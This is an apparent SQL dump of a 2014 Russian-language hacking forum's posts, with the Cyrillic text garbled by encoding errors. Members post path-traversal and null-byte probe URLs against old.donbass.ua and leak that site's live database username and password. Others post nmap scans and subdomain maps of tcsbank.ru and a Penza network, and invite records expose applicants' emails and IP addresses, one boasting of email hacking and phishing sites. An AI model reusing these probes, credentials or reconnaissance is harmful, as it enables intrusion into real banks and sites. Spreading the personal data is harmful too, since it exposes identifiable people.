(2072, 1211, 1315, 'Psych0tr1a', 11, '', 1410976022, 'ÃËœ õщё чтþтþ ýõÿþýÑÂтýþõ\n[code]http://old.donbass.ua/admin/limg.php?img=8269.jpg&my_x=2000&my_y=2000\nhttp://old.donbass.ua/admin/limg.php?img=8269.jpg%00.jpg&my_x=2000&my_y=2000\n\nhttp://old.donbass.ua/admin/limg.php?img=/8269.jpg&my_x=2000&my_y=2000\nhttp://old.donbass.ua/admin/limg.php?img=./8269.jpg&my_x=2000&my_y=2000\nhttp://old.donbass.ua/admin/limg.php?img=123312/../8269.jpg&my_x=2000&my_y=2000\n\n[/code]', 1, 0, '', 0, 1, 0, 0, 0),
(2079, 1728, 2066, 'w0rm', 1, '', 1411002812, 'ÿþрты ò ÿþôÑÂõтø \n[QUOTE]\nw0rm$ nmap -Pn 91.194.226.1/24\n\nStarting Nmap 6.47 ( [url]http://nmap.org[/url] ) at 2014-09-18 06:36 YEKT\n\nNmap scan report for 91.194.226.12\nHost is up (0.091s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\nNmap scan report for mobileapptest.tcsbank.ru (91.194.226.13)\nHost is up (0.091s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\n\n\nNmap scan report for [url]www.tinkov.com[/url] (91.194.226.17)\nHost is up (0.092s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp closed https\n\n\n\nNmap scan report for 91.194.226.20\nHost is up (0.090s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\n\nNmap scan report for pay.tcsbank.ru (91.194.226.22)\nHost is up (0.087s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n443/tcp open https\n\n\n\nNmap scan report for sdo.tcsbank.ru (91.194.226.27)\nHost is up (0.090s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\n\nNmap scan report for xn--b1aaa.xn--80ab0acovf.xn--p1ai (91.194.226.30)\nHost is up (0.093s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n\n\nNmap scan report for auth.tcsbank.ru (91.194.226.32)\nHost is up (0.088s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n443/tcp open https\n\nNmap scan report for 91.194.226.33\nHost is up (0.092s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp closed https\n\nNmap scan report for mobileapp.tcsbank.ru (91.194.226.34)\nHost is up (0.034s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\nNmap scan report for target.tcsbank.ru (91.194.226.35)\nHost is up (0.091s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\nNmap scan report for [url]www.sber-pochta.ru[/url] (91.194.226.36)\nHost is up (0.087s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp closed https\n\n\n\nNmap scan report for ws1.tcsbank.ru (91.194.226.38)\nHost is up (0.091s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n8090/tcp open unknown\n\n\n\nNmap scan report for mobileappdev.tcsbank.ru (91.194.226.41)\nHost is up (0.092s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\nNmap scan report for kupivkredit-test-fe.tcsbank.ru (91.194.226.42)\nHost is up (0.089s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\nNmap scan report for magentbep.tcsbank.ru (91.194.226.43)\nHost is up (0.088s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n443/tcp open https\n\nNmap scan report for kupivkredit.ru (91.194.226.44)\nHost is up (0.092s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\nNmap scan report for 91.194.226.45\nHost is up (0.088s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n443/tcp open https\n\n\n\n\n\n\nNmap scan report for mail03.tcsbank.ru (91.194.226.49)\nHost is up (0.090s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n443/tcp open https\n\nNmap scan report for magentbet.tcsbank.ru (91.194.226.50)\nHost is up (0.100s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n443/tcp open https\n\nNmap scan report for emm.tcsbank.ru (91.194.226.51)\nHost is up (0.094s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\nNmap scan report for secure.tcsbank.ru (91.194.226.52)\nHost is up (0.090s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n443/tcp open https\n\nNmap scan report for acs.tcsbank.ru (91.194.226.53)\nHost is up (0.089s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n1443/tcp open ies-lm\n\n\n\nNmap scan report for 91.194.226.56\nHost is up (0.089s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\nNmap scan report for www-qa2.tcsbank.ru (91.194.226.57)\nHost is up (0.090s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n443/tcp open https\n\n\nNmap scan report for img-tracker.tcsbank.ru (91.194.226.60)\nHost is up (0.049s latency).\nNot shown: 998 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\n\n\nNmap scan report for img.test.tracker.tcsbank.ru (91.194.226.63)\nHost is up (0.093s latency).\nNot shown: 997 filtered ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n1433/tcp open ms-sql-s\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2078, 1728, 2066, 'w0rm', 1, '', 1410995759, '_ttps://91.194.226.42/join/\n_ttps://kupivkredit-test-fe.tcsbank.ru/offer/\nSymfony фрÑÂùüòþрú\n\n\nôþüõýы:\n[url]http://bgp.he.net/net/91.194.226.0/24#_dns[/url]\n\n\nöøòðѠÑÂõÑÂÑÂøÑÂ\n_ttps://e-learning.tcsbank.ru/webtutor/HCC/01_TCS/1/start.html?\naicc_sid=5918228343128131129&aicc_url=https%3A%2F%2Fe-learning.tcsbank.ru%2Fhandler.html\n\n[url]https://github.com/thumbtack-technology/training-2013-portal/blob/master/database/test_data.sql[/url]\n\n[url]https://e-learning.tcsbank.ru/webtutor/[/url]\nE:\\WebSoft\\WebTutorServer\\webtutor\\', 1, 0, '', 0, 1, 0, 0, 0),
(2077, 1099, 1170, 'w0rm', 1, '', 1410987384, 'òõрýõü, òрõüõýýыõ ÿрþñûõüы Ñ ÑÂõрòõрþü.', 1, 0, '', 0, 1, 0, 0, 0),
(2080, 1728, 2066, 'w0rm', 1, '', 1411005198, '[url]http://91.194.226.56/test/[/url]\nWelcome to Jetty 7 - REMOTE ACCESS\n\n[url]http://pistat.tcsbank.ru/info.php[/url] - phpinfo()', 1, 0, '', 0, 1, 0, 0, 0),
(2081, 1083, 1119, 'Bo0om', 7, '', 1411008788, '×ðúð÷, ýуöýþ þцõýøть ÑÂтþøüþÑÂть ѠÿþÑÂûõôующøü ÿþхõúþü\ngzstuff.com ø cityweekend.com.cn \nÃÂуöýþ ñô ю÷õрþò\nemail; тõû ; øüѠø Ñ‚.ÿ.\n\nÞ÷òучøтõ цõýу, ÿõрõôðü úøтðùцðü, ÑÂþóûðÑÂуõü ÑÂтþøüþÑÂть', 1, 0, '', 0, 1, 0, 0, 0),
(2082, 1729, 0, 'Invite', 2, '{$name}', 1411012004, '[SIZE=\'4\'][COLOR=\'Sienna\']goodgod[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: goodgod@xmpp.jp\n[b]e-mail[/b]: goodgod@socialware.ru\n[b]Info[/b]: I\'am from Russia. now, live in China.\r\n\r\nAuthor of www.socialware.ru: one of the best projects in runet on social engineering.\r\n\r\nMedia about us:\r\nhttp://habrahabr.ru/post/80360/\r\nhttp://habrahabr.ru/post/89882/\r\nhttp://habrahabr.ru/post/60589/\r\nhttp://xakep.ru/articles/54169/\r\n \r\nMy skills:\r\n- have a lot of experience in hacking email services in russia: mail.ru, yandex.ru, rambler etc, and other corporate email services.\r\n- can make fishing websites\r\n\r\nProfiles:\r\nhttp://bss-family.biz/forum/member.php?u=1224\r\nhttps://forum.antichat.ru/member.php?u=30784\r\n\r\nMy interests: \r\nHacking, Social Engineering, Psychology, NLP, Business, China.\r\n\r\n* often have orders for hacking websites or emails^^\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 183.2.223.237\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/GOODGODGOODGOD | https://twitter.com/GOODGODGOODGOD \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2083, 1728, 2066, 'w0rm', 1, '', 1411012394, '_ttps://github.com/kupivkredit/kupivkredit/tree/master/src/Kupivkredit\nõщõ ÑÂþрцы', 1, 0, '', 0, 1, 0, 0, 0),
(2084, 1728, 2066, 'Psych0tr1a', 11, '', 1411013378, 'Þóрþüýþõ ÑÂÿðÑÂøñþ)', 1, 0, '', 0, 1, 0, 0, 0),
(2085, 1728, 2066, 'w0rm', 1, '', 1411014387, 'inurl:[url]www.tcsbank.ru/stream/[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(2086, 1728, 2066, '123', 41, '', 1411032089, '[178.248.239.52] api.tcsbank.ru\n[91.194.226.32] auth.tcsbank.ru\n[91.194.226.49] autodiscover.tcsbank.ru\n[91.194.226.59] beta.tcsbank.ru\n[91.194.227.20] bs.tcsbank.ru\n[54.247.76.112 54.247.90.32 54.246.96.225] cdn.tcsbank.ru\n[91.194.226.134] m.tcsbank.ru\n[91.194.226.23] my.tcsbank.ru\n[91.194.226.115] mx1.tcsbank.ru\n[91.194.226.11] ns.tcsbank.ru\n[178.248.239.11] ns7.tcsbank.ru\n[91.194.226.134] ok.tcsbank.ru\n[91.194.226.19] online.tcsbank.ru\n[91.194.226.49] owa.tcsbank.ru\n[91.194.226.22] pay.tcsbank.ru\n[91.194.226.134] promo.tcsbank.ru\n[91.194.226.52] secure.tcsbank.ru\n[91.194.226.102] sf.tcsbank.ru\n[91.194.226.36] start.tcsbank.ru\n[178.248.239.50] static.tcsbank.ru\n[91.194.227.22] test.tcsbank.ru\n[91.194.226.60] tracker.tcsbank.ru\n[91.194.226.38] ws1.tcsbank.ru\n[91.194.226.116] ws2.tcsbank.ru\n[178.248.239.11] [url]www.tcsbank.ru[/url]\n[91.194.226.129] zp.tcsbank.ru', 1, 0, '', 0, 1, 0, 0, 0),
(2087, 1211, 1315, '123', 41, '', 1411033122, '/home/donbass/data/www/old.donbass.ua/\n\n/var/log/nginx/old.donbass.ua.access.log\n\n$username = \'webdonbass\';\n $password = \'Q2we4S3df5\';\n $dbName = \'donbass_old\';', 1, 0, '', 0, 1, 0, 0, 0),
(2088, 1730, 0, 'w0rm', 1, '', 1411033268, 'ßытðюÑÂÑŒ ÿрþñøть рõðûьýыù øÿ.\ndcaz.net cõрòõр ûþóþò ÿþô úûðуôþü.\n[url]http://dcaznet.pen.io/[/url] - ÷õрúðûþ ûøñþ ÑÂтþт-öõ ÑÂõрòõр.\n[url]http://dcaznet.pen.io/phpmyadmin[/url]\n[url]http://dcaznet.pen.io/test/[/url]\n\nõщõ þôøý ðôõúòðтýыù øÿ\n[url]https://btce.penek.org[/url]\n\n[url]https://81.200.241.51/robots.txt[/url] чтþ-тþ тøÿð òøôøüþ...\n81.200.241.57 ýу ø ÑÂðü ÿõýõú\n\n[url]https://p2pool.novaco.in[/url] \n\n[code]\nlocalhost:~ w0rm$ nmap -Pn 81.200.241.0/24\n\nStarting Nmap 6.47 ( http://nmap.org ) at 2014-09-18 16:38 YEKT\nWarning: 81.200.241.54 giving up on port because retransmission cap hit (10).\nWarning: 81.200.241.55 giving up on port because retransmission cap hit (10).\nWarning: 81.200.241.18 giving up on port because retransmission cap hit (10).\nStats: 0:09:30 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan\nConnect Scan Timing: About 94.39% done; ETC: 16:49 (0:00:33 remaining)\nNmap scan report for starbase-link1.penza.com.ru (81.200.241.0)\nHost is up.\nAll 1000 scanned ports on starbase-link1.penza.com.ru (81.200.241.0) are filtered\n\nNmap scan report for gw-starbase.penza.com.ru (81.200.241.1)\nHost is up.\nAll 1000 scanned ports on gw-starbase.penza.com.ru (81.200.241.1) are filtered\n\nNmap scan report for starbase.penza.com.ru (81.200.241.2)\nHost is up.\nAll 1000 scanned ports on starbase.penza.com.ru (81.200.241.2) are filtered\n\nNmap scan report for starbase-link2.penza.com.ru (81.200.241.3)\nHost is up.\nAll 1000 scanned ports on starbase-link2.penza.com.ru (81.200.241.3) are filtered\n\nNmap scan report for kbb-komarovo-link1.penza.com.ru (81.200.241.4)\nHost is up (0.047s latency).\nAll 1000 scanned ports on kbb-komarovo-link1.penza.com.ru (81.200.241.4) are closed (953) or filtered (47)\n\nNmap scan report for gw-kbb-komarovo.penza.com.ru (81.200.241.5)\nHost is up (0.050s latency).\nAll 1000 scanned ports on gw-kbb-komarovo.penza.com.ru (81.200.241.5) are closed (953) or filtered (47)\n\nNmap scan report for kbb-komarovo.penza.com.ru (81.200.241.6)\nHost is up (0.067s latency).\nNot shown: 997 closed ports\nPORT STATE SERVICE\n135/tcp filtered msrpc\n139/tcp filtered netbios-ssn\n445/tcp filtered microsoft-ds\n\nNmap scan report for kbb-komarovo-link2.penza.com.ru (81.200.241.7)\nHost is up (0.048s latency).\nAll 1000 scanned ports on kbb-komarovo-link2.penza.com.ru (81.200.241.7) are closed (952) or filtered (48)\n\nNmap scan report for pges-strl-link1.penza.com.ru (81.200.241.8)\nHost is up (0.047s latency).\nAll 1000 scanned ports on pges-strl-link1.penza.com.ru (81.200.241.8) are closed (953) or filtered (47)\n\nNmap scan report for gw-pges-strl.penza.com.ru (81.200.241.9)\nHost is up (0.047s latency).\nAll 1000 scanned ports on gw-pges-strl.penza.com.ru (81.200.241.9) are closed (953) or filtered (47)\n\nNmap scan report for pgess.penza.com.ru (81.200.241.10)\nHost is up.\nAll 1000 scanned ports on pgess.penza.com.ru (81.200.241.10) are filtered\n\nNmap scan report for pges-strl-link2.penza.com.ru (81.200.241.11)\nHost is up (0.048s latency).\nAll 1000 scanned ports on pges-strl-link2.penza.com.ru (81.200.241.11) are closed (952) or filtered (48)\n\nNmap scan report for tovarisch-link1.penza.com.ru (81.200.241.12)\nHost is up.\nAll 1000 scanned ports on tovarisch-link1.penza.com.ru (81.200.241.12) are filtered\n\nNmap scan report for gw-tovarisch.penza.com.ru (81.200.241.13)\nHost is up.\nAll 1000 scanned ports on gw-tovarisch.penza.com.ru (81.200.241.13) are filtered\n\nNmap scan report for tovarisch.penza.com.ru (81.200.241.14)\nHost is up.\nAll 1000 scanned ports on tovarisch.penza.com.ru (81.200.241.14) are filtered\n\nNmap scan report for tovarisch-link2.penza.com.ru (81.200.241.15)\nHost is up.\nAll 1000 scanned ports on tovarisch-link2.penza.com.ru (81.200.241.15) are filtered\n\nNmap scan report for ns2-link1.penza.com.ru (81.200.241.16)\nHost is up.\nAll 1000 scanned ports on ns2-link1.penza.com.ru (81.200.241.16) are filtered\n\nNmap scan report for gw-ns2.penza.com.ru (81.200.241.17)\nHost is up (0.046s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n113/tcp open ident\n\nNmap scan report for ns2.penza.com.ru (81.200.241.18)\nHost is up (0.072s latency).\nNot shown: 996 closed ports\nPORT STATE SERVICE\n135/tcp filtered msrpc\n139/tcp filtered netbios-ssn\n445/tcp filtered microsoft-ds\n3659/tcp filtered apple-sasl\n\nNmap scan report for ns2-link2.penza.com.ru (81.200.241.19)\nHost is up.\nAll 1000 scanned ports on ns2-link2.penza.com.ru (81.200.241.19) are filtered\n\nNmap scan report for atom-link1.penza.com.ru (81.200.241.20)\nHost is up (0.048s latency).\nAll 1000 scanned ports on atom-link1.penza.com.ru (81.200.241.20) are closed (952) or filtered (48)\n\nNmap scan report for gw-atom.penza.com.ru (81.200.241.21)\nHost is up (0.050s latency).\nAll 1000 scanned ports on gw-atom.penza.com.ru (81.200.241.21) are closed (949) or filtered (51)\n\nNmap scan report for atom.penza.com.ru (81.200.241.22)\nHost is up (0.064s latency).\nNot shown: 997 closed ports\nPORT STATE SERVICE\n135/tcp filtered msrpc\n139/tcp filtered netbios-ssn\n445/tcp filtered microsoft-ds\n\nNmap scan report for atom-link2.penza.com.ru (81.200.241.23)\nHost is up (0.050s latency).\nAll 1000 scanned ports on atom-link2.penza.com.ru (81.200.241.23) are closed (953) or filtered (47)\n\nNmap scan report for elcom-link1.penza.com.ru (81.200.241.24)\nHost is up (0.049s latency).\nAll 1000 scanned ports on elcom-link1.penza.com.ru (81.200.241.24) are closed (953) or filtered (47)\n\nNmap scan report for gw-elcom.penza.com.ru (81.200.241.25)\nHost is up (0.050s latency).\nAll 1000 scanned ports on gw-elcom.penza.com.ru (81.200.241.25) are closed (953) or filtered (47)\n\nNmap scan report for elcom.penza.com.ru (81.200.241.26)\nHost is up (0.047s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n25/tcp open smtp\n\nNmap scan report for elcom-link2.penza.com.ru (81.200.241.27)\nHost is up (0.047s latency).\nAll 1000 scanned ports on elcom-link2.penza.com.ru (81.200.241.27) are closed (951) or filtered (49)\n\nNmap scan report for 81.200.241.28\nHost is up.\nAll 1000 scanned ports on 81.200.241.28 are filtered\n\nNmap scan report for 81.200.241.29\nHost is up.\nAll 1000 scanned ports on 81.200.241.29 are filtered\n\nNmap scan report for 81.200.241.30\nHost is up.\nAll 1000 scanned ports on 81.200.241.30 are filtered\n\nNmap scan report for 81.200.241.31\nHost is up.\nAll 1000 scanned ports on 81.200.241.31 are filtered\n\nNmap scan report for rosbankbot-link1.penza.com.ru (81.200.241.32)\nHost is up (0.049s latency).\nAll 1000 scanned ports on rosbankbot-link1.penza.com.ru (81.200.241.32) are closed (952) or filtered (48)\n\nNmap scan report for gw-riosbankbot.penza.com.ru (81.200.241.33)\nHost is up (0.048s latency).\nAll 1000 scanned ports on gw-riosbankbot.penza.com.ru (81.200.241.33) are closed (953) or filtered (47)\n\nNmap scan report for rosbank.penza.com.ru (81.200.241.34)\nHost is up.\nAll 1000 scanned ports on rosbank.penza.com.ru (81.200.241.34) are filtered\n\nNmap scan report for rosbankbot-link2.penza.com.ru (81.200.241.35)\nHost is up (0.049s latency).\nAll 1000 scanned ports on rosbankbot-link2.penza.com.ru (81.200.241.35) are closed (950) or filtered (50)\n\nNmap scan report for sonata-tern-link1.penza.com.ru (81.200.241.36)\nHost is up (0.049s latency).\nAll 1000 scanned ports on sonata-tern-link1.penza.com.ru (81.200.241.36) are closed (952) or filtered (48)\n\nNmap scan report for gw-sonata-tern.penza.com.ru (81.200.241.37)\nHost is up (0.046s latency).\nAll 1000 scanned ports on gw-sonata-tern.penza.com.ru (81.200.241.37) are closed (952) or filtered (48)\n\nNmap scan report for sonata-tern.penza.com.ru (81.200.241.38)\nHost is up (0.045s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE\n5060/tcp open sip\n\nNmap scan report for sonata-tern-link2.penza.com.ru (81.200.241.39)\nHost is up (0.049s latency).\nAll 1000 scanned ports on sonata-tern-link2.penza.com.ru (81.200.241.39) are closed (952) or filtered (48)\n\nNmap scan report for 81.200.241.40\nHost is up.\nAll 1000 scanned ports on 81.200.241.40 are filtered\n\nNmap scan report for 81.200.241.41\nHost is up.\nAll 1000 scanned ports on 81.200.241.41 are filtered\n\nNmap scan report for 81.200.241.42\nHost is up.\nAll 1000 scanned ports on 81.200.241.42 are filtered\n\nNmap scan report for 81.200.241.43\nHost is up.\nAll 1000 scanned ports on 81.200.241.43 are filtered\n\nNmap scan report for 81.200.241.44\nHost is up.\nAll 1000 scanned ports on 81.200.241.44 are filtered\n\nNmap scan report for 81.200.241.45\nHost is up.\nAll 1000 scanned ports on 81.200.241.45 are filtered\n\nNmap scan report for 81.200.241.46\nHost is up.\nAll 1000 scanned ports on 81.200.241.46 are filtered\n\nNmap scan report for 81.200.241.47\nHost is up.\nAll 1000 scanned ports on 81.200.241.47 are filtered\n\nNmap scan report for 81.200.241.48\nHost is up.\nAll 1000 scanned ports on 81.200.241.48 are filtered\n\nNmap scan report for 81.200.241.49\nHost is up.\nAll 1000 scanned ports on 81.200.241.49 are filtered\n\nNmap scan report for 81.200.241.50\nHost is up.\nAll 1000 scanned ports on 81.200.241.50 are filtered\n\nNmap scan report for 81.200.241.51\nHost is up (0.049s latency).\nNot shown: 942 filtered ports, 56 closed ports\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open https\n\nNmap scan report for 81.200.241.52\nHost is up.\nAll 1000 scanned ports on 81.200.241.52 are filtered\n\nNmap scan report for 81.200.241.53\nHost is up.\nAll 1000 scanned ports on 81.200.241.53 are filtered\n\nNmap scan report for 81.200.241.54\nHost is up (0.047s latency).\nNot shown: 993 closed ports\nPORT STATE SERVICE\n80/tcp open http\n135/tcp filtered msrpc\n139/tcp filtered netbios-ssn\n443/tcp open https\n445/tcp filtered microsoft-ds\n3905/tcp filtered mupdate\n7777/tcp open cbt\n\nNmap scan report for 81.200.241.55\nHost is up (0.046s latency).\nNot shown: 993 closed ports\nPORT STATE SERVICE\n80/tcp open http\n135/tcp filtered msrpc\n139/tcp filtered netbios-ssn\n143/tcp filtered imap\n443/tcp open https\n445/tcp filtered microsoft-ds\n8042/tcp filtered fs-agent\n\nNmap scan report for amtech.info (81.200.241.56)\nHost is up.\nAll 1000 scanned ports on amtech.info (81.200.241.56) are filtered\n\nNmap scan report for amtech.info (81.200.241.57)\nHost is up (0.049s latency).\nNot shown: 940 filtered ports, 55 closed ports\nPORT STATE SERVICE\n21/tcp open ftp\n53/tcp open domain\n80/tcp open http\n5222/tcp open xmpp-client\n5269/tcp open xmpp-server\n\nNmap scan report for amtek-add-host2.penza.com.ru (81.200.241.58)\nHost is up (0.047s latency).\nNot shown: 997 filtered ports\nPORT STATE SERVICE\n70/tcp open gopher\n5555/tcp open freeciv\n6667/tcp open irc\n\nNmap scan report for amtek-add-link2.penza.com.ru (81.200.241.59)\nHost is up (0.050s latency).\nNot shown: 991 closed ports\nPORT STATE SERVICE\n25/tcp open smtp\n110/tcp open pop3\n135/tcp filtered msrpc\n139/tcp filtered netbios-ssn\n143/tcp open imap\n443/tcp open https\n445/tcp filtered microsoft-ds\n3546/tcp filtered unknown\n7025/tcp open vmsvc-2\n\nNmap scan report for mail.amtech.su (81.200.241.60)\nHost is up (0.048s latency).\nNot shown: 986 closed ports\nPORT STATE SERVICE\n25/tcp open smtp\n135/tcp filtered msrpc\n139/tcp filtered netbios-ssn\n143/tcp open imap\n389/tcp filtered ldap\n443/tcp open https\n445/tcp filtered microsoft-ds\n993/tcp open imaps\n995/tcp open pop3s\n1147/tcp filtered capioverlan\n2875/tcp filtered dxmessagebase2\n3827/tcp filtered netmpi\n5222/tcp open xmpp-client\n5269/tcp open xmpp-server\n\nNmap scan report for 81.200.241.61\nHost is up (0.052s latency).\nNot shown: 996 closed ports\nPORT STATE SERVICE\n135/tcp filtered msrpc\n139/tcp filtered netbios-ssn\n445/tcp filtered microsoft-ds\n7777/tcp open cbt\n\nNmap scan report for 81.200.241.62\nHost is up (0.048s latency).\nNot shown: 997 closed ports\nPORT STATE SERVICE\n135/tcp filtered msrpc\n139/tcp filtered netbios-ssn\n445/tcp filtered microsoft-ds\n\nNmap scan report for 81.200.241.63\nHost is up.\nAll 1000 scanned ports on 81.200.241.63 are filtered\n\n\n[/code]', 1, 0, '', 0, 1, 0, 0, 0),
(2089, 1731, 0, 'Invite', 2, '{$name}', 1411033750, '[SIZE=\'4\'][COLOR=\'Sienna\']turk77[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: turk77@istanbul.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.1.34.4\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://turk77.deviantart.com | turk77.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2097, 1732, 0, 'Invite', 2, '{$name}', 1411043352, '[SIZE=\'4\'][COLOR=\'Sienna\']53x0r[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: psych0tic@richim.org\n[b]e-mail[/b]: swipers@inbox.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.217.147.99\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://53x0r.wordpress.com | 53x0r.wordpress.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2096, 1730, 2088, 'w0rm', 1, '', 1411041157, '[url]ftp://penek.org[/url] ÿуÑÂúðõт ÿþô óþÑÂтõü', 1, 0, '', 0, 1, 0, 0, 0),
(2094, 1728, 2066, 'BigBear', 34, '', 1411038021, 'чõü øÿы ø ôþüõýы òыôõрýуû?', 1, 0, '', 0, 1, 0, 0, 0),
(2095, 1728, 2066, 'w0rm', 1, '', 1411041064, 'dig axfr cуôѠÿþ òÑÂõüу', 1, 0, '', 0, 1, 0, 0, 0),
(2199, 1808, 0, 'Invite', 2, '{$name}', 1411809920, '[SIZE=\'4\'][COLOR=\'Sienna\']juieves[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: juieves@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.37.210.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our 